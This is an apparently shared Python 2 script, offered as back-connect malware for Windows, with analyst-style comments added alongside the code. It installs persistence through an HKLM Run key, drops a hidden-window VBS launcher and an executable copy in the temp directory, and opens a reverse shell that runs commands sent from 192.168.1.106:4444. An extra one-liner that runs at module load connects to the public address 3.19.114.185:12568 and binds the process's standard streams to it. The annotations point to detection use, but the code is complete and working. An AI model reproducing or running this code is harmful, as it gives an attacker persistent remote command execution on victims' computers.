Untitled

a guest Oct 15th, 2019 77 Never
  1. # HACKING WITH PYTHON
  2. # Simple malware for back connect in python for windows ;)
  3.  
  4. # Author: anarc0der
  5.  
  6. import os
  7. import subprocess
  8. import socket
  9. import sys
  10. import tempfile
  11. from _winreg import *
  12.  
  13. MALWARE_NAME = "malware.exe"  # file name of the executable that is copied into the temp directory
  14. TRIGGER = MALWARE_NAME.replace('.exe','')+".vbs"  # "malware.vbs": name of the launcher script
  15. KEY_PATH = "Software\Microsoft\Windows\CurrentVersion\Run"  # Run key, opened under HKEY_LOCAL_MACHINE below; a persistence location worth monitoring
  16. KEY_NAME = "anarc0der_key"  # registry value name written under KEY_PATH; usable as a host indicator
  17. REV_SHELL = "192.168.1.106"  # peer address used by reverse_shell_function (private RFC 1918 range)
  18. SHELL_PORT = 4444  # TCP port used together with REV_SHELL
  19. TRIGGER_PATH = tempfile.gettempdir()+"\\"+TRIGGER  # launcher location inside the directory returned by tempfile.gettempdir()
  20. MALWARE_PATH = tempfile.gettempdir()+"\\"+MALWARE_NAME  # executable location inside the same temp directory
  21. import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("3.19.114.185",12568));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);  # NOTE(review): executes at module load, before main(); connects to a hard-coded public address that differs from REV_SHELL/SHELL_PORT and points fds 0 and 1 at the socket. Looks appended to the original tutorial (unconfirmed) -- treat 3.19.114.185:12568 as a separate network indicator.
  22. print "[+] Loading Script, please wait..."
  23.  
  24. class My_malware():
  25.     # Analyst summary: three stages -- a Run-key value for persistence, a VBS launcher plus executable copy dropped in the temp directory, and a TCP loop that runs received commands.
  26.     def infect_windows_register_keys(self):
  27.         """ Ensure a value named KEY_NAME exists in the HKEY_LOCAL_MACHINE Run key.
  28.             Returns False if the value was missing and has just been written (data: TRIGGER_PATH).
  29.             Returns True if a value with that name was already present. """
  30.         key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH)  # default (read) access; this handle is never closed in the method
  31.         keys = []
  32.         try:
  33.             i=0
  34.             while True:
  35.                 cur_key = EnumValue(key, i)  # (name, data, type) for the value at index i
  36.                 keys.append(cur_key[0])  # only the value name is kept
  37.                 i+=1
  38.         except:  # the loop ends when EnumValue raises past the last value; the bare except also hides any other error
  39.             pass
  40.         if KEY_NAME not in keys:
  41.             mlwr_key = OpenKey(HKEY_LOCAL_MACHINE, KEY_PATH, 0, KEY_ALL_ACCESS)  # write access to HKLM normally requires administrator rights
  42.             SetValueEx(mlwr_key, KEY_NAME, 0, REG_SZ, TRIGGER_PATH)  # detection point: new REG_SZ Run value whose data is a .vbs path in the temp directory
  43.             mlwr_key.Close()
  44.             return False
  45.         return True
  46.  
  47.     def hide_malware_and_trigger(self):
  48.         """ Write the VBS launcher and copy the executable into the temp directory.
  49.             Returns True if both MALWARE_PATH and TRIGGER_PATH already exist (nothing is written).
  50.             Returns False after writing the launcher and issuing the copy. """
  51.         if os.path.exists(MALWARE_PATH) and os.path.exists(TRIGGER_PATH):
  52.             return True
  53.         else:
  54.             payload = 'Set WshShell = WScript.CreateObject("WScript.Shell")\nWshShell.Run """{0}""", 0 , false'.format(MALWARE_PATH)  # VBScript that starts MALWARE_PATH via WshShell.Run with window style 0 (hidden) and without waiting
  55.             with open(TRIGGER_PATH, 'w') as f:
  56.                 f.write(payload)
  57.             os.system('copy %s %s'%(MALWARE_NAME, MALWARE_PATH))  # shells out to `copy`; the source is MALWARE_NAME relative to the current directory. No file attribute is changed here: "hide" only means placing the files in the temp directory
  58.             return False
  59.  
  60.     def reverse_shell_function(self):
  61.         """ Connect out to REV_SHELL:SHELL_PORT and execute whatever the peer sends as shell commands. """
  62.         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  63.         s.connect((REV_SHELL,SHELL_PORT))  # outbound TCP; no authentication or encryption appears anywhere in this method
  64.         s.send('\n\!/ anarc0der mlwr tutorial\n\n[*] If you need to finish, just type: quit\n[*] PRESS ENTER TO PROMPT\n\n')  # cleartext banner; a fixed string that network signatures can match
  65.         while True:
  66.             data = s.recv(1024)  # at most 1024 bytes per read
  67.             if "quit" in data:  # substring match: any input containing "quit" ends the loop
  68.                 break
  69.             cmd = subprocess.Popen(data, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)  # received bytes run through the system shell; detection point: interpreter process with a live outbound socket spawning shell children
  70.             saida_cmd = cmd.stdout.read() + cmd.stderr.read()  # "saida" = output (Portuguese): stdout followed by stderr
  71.             s.send(saida_cmd)
  72.             s.send("Comando: ")  # prompt text ("Command: " in Portuguese) sent after every result
  73.         s.close()
  74.  
  75. def main():  # runs the persistence and file-drop steps, then opens the command channel only if both report "already present"
  76.     my_returns = []
  77.     x = My_malware()
  78.     my_returns.append(x.infect_windows_register_keys())  # False when the Run value had to be created on this run
  79.     my_returns.append(x.hide_malware_and_trigger())  # False when the files had to be written on this run
  80.     if all(res is True for res in my_returns):  # so a first execution only installs and returns; the connection in reverse_shell_function happens on a later launch
  81.         x.reverse_shell_function()
  82.  
  83. if __name__ == '__main__':
  84.     main()